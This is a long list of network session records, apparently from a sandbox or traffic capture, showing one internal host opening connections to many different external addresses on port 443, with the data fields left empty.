                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27438192.168.2.233542461.243.184.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27439192.168.2.2339468120.128.151.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27440192.168.2.2343168130.66.181.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27441192.168.2.2339602205.48.191.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27442192.168.2.235233225.91.7.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27443192.168.2.2357192131.210.159.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27444192.168.2.233851637.102.197.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27445192.168.2.2347512115.211.68.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27446192.168.2.234788440.99.61.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27447192.168.2.2346020149.215.0.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27448192.168.2.2348110121.129.44.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27449192.168.2.2340212184.191.33.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27450192.168.2.2357938133.138.227.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27451192.168.2.2349660211.158.215.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27452192.168.2.2340824217.239.87.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27453192.168.2.234161425.42.208.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27454192.168.2.234625678.1.41.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27455192.168.2.2356272152.201.62.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27456192.168.2.233327463.32.105.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27457192.168.2.2334706112.155.101.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27458192.168.2.233537640.86.53.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27459192.168.2.2358970123.183.187.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27460192.168.2.2348746182.130.36.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27461192.168.2.2339528134.168.18.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27462192.168.2.233387689.244.56.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27463192.168.2.2344122192.125.12.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27464192.168.2.235733413.120.81.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27465192.168.2.2357774106.253.242.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27466192.168.2.233802269.12.51.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27467192.168.2.2354814122.63.203.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27468192.168.2.235280841.28.31.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27469192.168.2.2341730158.94.198.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27470192.168.2.235707880.82.26.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27471192.168.2.2342320150.16.15.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27472192.168.2.2336036101.139.87.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27473192.168.2.2355034209.243.53.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27474192.168.2.2333068106.183.131.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27475192.168.2.2341988150.135.16.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27476192.168.2.233738820.152.155.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27477192.168.2.234702080.127.185.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27478192.168.2.2335916171.72.251.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27479192.168.2.2343622223.14.57.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27480192.168.2.2339594176.88.28.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27481192.168.2.2358924177.75.77.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27482192.168.2.2338186144.159.47.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27483192.168.2.2350970125.2.214.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27484192.168.2.2343860216.244.23.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27485192.168.2.2334936122.105.182.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27486192.168.2.2357278134.241.210.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27487192.168.2.2357856132.147.6.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27488192.168.2.235070614.198.0.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27489192.168.2.2346116128.11.97.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27490192.168.2.2343650107.98.99.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27491192.168.2.2340576107.144.61.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27492192.168.2.2352296223.149.252.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27493192.168.2.2349752151.170.39.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27494192.168.2.2336978142.33.99.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27495192.168.2.2345232123.165.223.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27496192.168.2.234286046.47.109.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27497192.168.2.2350852137.34.19.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27498192.168.2.2333256212.123.180.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27499192.168.2.234168293.244.100.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27500192.168.2.235205020.111.40.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27501192.168.2.233986631.132.154.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27502192.168.2.233806046.193.122.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27503192.168.2.235577441.252.70.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27504192.168.2.233308257.105.131.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27505192.168.2.2351934166.67.85.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27506192.168.2.2348978160.24.100.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27507192.168.2.2356810199.152.191.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27508192.168.2.233326217.22.9.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27509192.168.2.2351548213.165.218.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27510192.168.2.233424273.134.97.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27511192.168.2.2348998211.249.185.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27512192.168.2.2356060209.181.236.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27513192.168.2.2356160147.210.203.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27514192.168.2.2339968118.163.181.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27515192.168.2.235122018.178.229.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27516192.168.2.2342188182.226.191.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27517192.168.2.235604035.242.237.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27518192.168.2.233357632.59.228.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27519192.168.2.2334142160.142.48.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27520192.168.2.235110497.179.76.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27521192.168.2.235952643.253.44.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27522192.168.2.2334830187.106.132.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27523192.168.2.234926696.192.237.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27524192.168.2.2338546154.7.185.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27525192.168.2.233488057.104.240.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27526192.168.2.2360304138.39.243.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27527192.168.2.234294661.124.145.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27528192.168.2.2344546135.237.30.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27529192.168.2.2349904128.69.191.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27530192.168.2.233767451.183.153.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27531192.168.2.2349264174.114.184.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27532192.168.2.234260235.53.126.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27533192.168.2.2333442117.155.147.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27534192.168.2.2342982154.164.166.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27535192.168.2.2346408107.73.144.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27536192.168.2.235058012.195.204.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27537192.168.2.2359760189.29.197.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27538192.168.2.234999625.45.192.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27539192.168.2.235900498.93.54.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27540192.168.2.2347908219.47.23.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27541192.168.2.2336928198.70.43.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27542192.168.2.235802494.165.96.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27543192.168.2.234430037.57.172.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27544192.168.2.2352212141.176.238.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27545192.168.2.233971414.241.83.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27546192.168.2.2346188201.104.157.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27547192.168.2.2349040210.27.28.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27548192.168.2.2353702114.155.240.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27549192.168.2.2346060159.98.86.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27550192.168.2.2348094117.68.215.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27551192.168.2.235420839.196.224.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27552192.168.2.2338498219.209.48.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27553192.168.2.2352792144.68.123.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27554192.168.2.2334654217.74.87.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27555192.168.2.2345140180.161.252.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27556192.168.2.2357082131.174.248.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27557192.168.2.2349320202.83.57.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27558192.168.2.2359910189.30.114.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27559192.168.2.2358002137.27.88.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27560192.168.2.2346648147.169.137.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27561192.168.2.2354604114.225.215.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27562192.168.2.2333826107.218.169.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27563192.168.2.233794649.153.40.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27564192.168.2.234569812.186.199.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27565192.168.2.235504284.248.75.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27566192.168.2.234523049.58.143.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27567192.168.2.2350916177.207.207.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27568192.168.2.2353132120.219.140.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27569192.168.2.2357386123.79.122.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27570192.168.2.234157440.244.107.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27571192.168.2.2349552121.45.89.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27572192.168.2.234924696.16.172.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27573192.168.2.2336074192.131.17.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27574192.168.2.23412908.236.228.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27575192.168.2.2355726115.251.147.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27576192.168.2.2334388175.93.79.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27577192.168.2.235509064.60.222.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27578192.168.2.2353846159.227.185.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27579192.168.2.2345312149.66.65.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27580192.168.2.234187879.0.171.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27581192.168.2.233522874.194.110.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27582192.168.2.2352316181.197.65.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27583192.168.2.235416858.223.57.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27584192.168.2.2356546213.59.90.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27585192.168.2.2338224178.130.187.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27586192.168.2.235997296.24.225.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27587192.168.2.235972494.162.241.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27588192.168.2.2344960185.127.238.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27589192.168.2.234564296.245.123.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27590192.168.2.235679489.70.205.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27591192.168.2.2346386148.53.82.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27592192.168.2.2344660198.52.27.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27593192.168.2.2346154195.165.160.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27594192.168.2.2334424170.25.57.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27595192.168.2.2333272197.215.34.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27596192.168.2.2347286106.184.189.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27597192.168.2.235134666.98.241.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27598192.168.2.233943478.203.249.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27599192.168.2.2345090196.158.97.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27600192.168.2.2351242173.209.35.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27601192.168.2.2345838180.192.249.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27602192.168.2.2337584157.244.80.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27603192.168.2.235071288.80.77.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27604192.168.2.2344126174.178.138.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27605192.168.2.2355634223.131.146.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27606192.168.2.2335358168.210.146.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27607192.168.2.2337464196.137.9.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27608192.168.2.2347840132.167.89.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27609192.168.2.2341364148.29.206.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27610192.168.2.2360948211.130.67.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27611192.168.2.2350146129.29.199.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27612192.168.2.234036444.225.159.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27613192.168.2.2348692103.99.134.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27614192.168.2.2349162188.159.177.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27615192.168.2.235607876.53.167.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27616192.168.2.234841814.55.151.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27617192.168.2.2356994173.26.122.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27618192.168.2.2339314145.189.84.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27619192.168.2.2357980105.48.84.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27620192.168.2.235202668.160.76.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27621192.168.2.2356162132.174.210.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27622192.168.2.235356049.72.55.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27623192.168.2.2333156155.230.224.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27624192.168.2.235331093.98.156.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27625192.168.2.2355722190.234.83.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27626192.168.2.233405036.210.58.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27627192.168.2.234240235.213.86.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27628192.168.2.2357472125.165.94.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27629192.168.2.2353432164.227.136.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27630192.168.2.234566252.74.220.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27631192.168.2.2333852220.121.145.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27632192.168.2.2334826105.137.157.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27633192.168.2.234215284.127.129.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27634192.168.2.2338786123.127.36.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27635192.168.2.233683836.238.192.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27636192.168.2.2352898151.245.69.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27637192.168.2.2360204205.163.206.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27638192.168.2.2338322156.27.202.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27639192.168.2.2356230140.103.47.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27640192.168.2.2354856126.249.134.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27641192.168.2.234626675.151.250.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27642192.168.2.2360298133.92.231.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27643192.168.2.234666864.181.26.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27644192.168.2.2339282183.151.108.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27645192.168.2.2333820182.216.130.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27646192.168.2.2333752197.8.177.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27647192.168.2.233681299.6.224.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27648192.168.2.235820040.155.20.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27649192.168.2.2341402175.137.23.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27650192.168.2.235312024.220.176.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27651192.168.2.2349742135.173.46.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27652192.168.2.234639418.253.185.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27653192.168.2.235797086.93.68.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27654192.168.2.23497801.227.35.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27655192.168.2.2360678202.31.109.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27656192.168.2.235833489.188.61.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27657192.168.2.233384252.68.185.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27658192.168.2.2347770197.15.251.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27659192.168.2.233429658.251.224.57443
